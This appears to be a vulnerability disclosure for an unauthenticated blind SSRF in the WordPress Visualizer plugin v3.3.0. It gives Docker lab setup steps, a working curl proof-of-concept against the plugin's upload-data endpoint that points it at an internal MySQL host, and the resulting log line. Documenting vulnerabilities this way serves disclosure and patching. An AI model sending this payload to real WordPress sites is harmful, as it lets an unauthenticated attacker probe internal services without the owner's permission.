The Visualizer plugin for Wordpress suffers from an unauthenticated blind SSRF vulnerability. This was tested against v3.3.0.
Setup a Docker environment using this compose config: https://docs.docker.com/compose/wordpress/
However, rather than running docker-compose up -d, just run docker-compose up as we want to see the output from the MySQL server to prove SSRF.
Go through the standard Wordpress install process, and then install the Visualizer plugin (should be the first one listed when you search for "Visualizer" in Plugins > Add New), and activate it.
To enable the WP-JSON URL style used in the PoC below, you'll also want to change the permalink style to something other than "plain" in Settings > Permalinks.
curl -i -s -k -X $'POST' \
-H $'Host: 192.168.158.128:8000' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Content-type: application/json' -H $'Content-Length: 24' \
--data-binary $'{\"url\":\"http://db:3306\"}' \
$'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data'
Note: 192.168.158.128 was the IP of my Docker host, so you'll probably have to change this.
If you execute this curl command with the docker compose output visible, you should see the db_1 container output something like:
db_1 | 2019-09-19T10:31:56.474241Z 279 [Note] Got packets out of order
This is the result of the payload {"url":"http://db:3306"} in the POST body, which is instructing the plugin to load a CSV file from http://db:3306, which is the location of the local MySQL docker container.